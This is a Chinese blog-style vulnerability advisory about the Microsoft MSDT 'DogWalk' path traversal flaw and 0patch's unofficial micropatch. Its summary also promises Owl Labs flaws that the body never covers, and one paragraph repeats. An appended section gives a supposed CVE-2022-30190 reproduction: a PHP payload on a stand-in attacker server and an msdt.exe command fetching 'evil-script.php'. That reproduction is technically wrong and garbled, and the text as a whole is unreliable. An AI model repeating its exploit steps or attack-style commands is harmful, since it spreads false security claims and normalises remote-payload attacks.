漏洞通告 | Microsoft MSDT 路径便利漏洞;Owl labs Meeting Owl Pro信息泄露漏洞

本文详细介绍了Microsoft MSDT路径遍历漏洞(DogWalk),该漏洞可能导致恶意可执行文件在Windows启动文件夹中自动执行。0patch提供了非官方微补丁。此外,还讨论了Owl Labs Meeting Owl Pro的信息泄露漏洞(CVE-2022-31460),包括其他四个高风险安全漏洞,受影响用户应升级到5.4.1.4版本进行修复。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

【Microsoft MSDT路径便利漏洞】

漏洞详情

MSDT(Microsoft Support Diagnostics Tool,微软支持诊断工具)是一种实用程序,用于排除故障并收集诊断数据以供专业人员分析和解决问题。

2020年1月,研究人员公开了微软诊断工具中的一个路径遍历0 day漏洞(被称为”DogWalk“),该漏洞位于 Microsoft 诊断工具的sdiageng.dll库中。当目标用户打开恶意制作的 .diagcab 文件(通过电子邮件接收或从Web下载)时,可以利用该漏洞将恶意可执行文件保存到 Windows 启动文件夹,该可执行文件将在下次重新启动 Windows 时自动执行。

影响范围

此漏洞影响大部分 Windows 版本(从Windows 7 、Server 2008到Windows 11 、Server 2022)

2022年6月7日,0patch 微补丁服务为大多数受影响的 Windows 版本发布了免费的非官方补丁,但要下载此补丁,用户需要注册0patch帐户并安装0patch agent。该微补丁适用于以下Windows版本:

安全建议

2022年6月7日,0patch 微补丁服务为大多数受影响的 Windows 版本发布了免费的非官方补丁,但要下载此补丁,用户需要注册0patch帐户并安装0patch agent。该微补丁适用于以下Windows版本:

Windows 11 v21H2

Windows 10 v21H2

Windows 10 v21H1

Windows 10

CVE-2022-30190是一个针对Microsoft漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值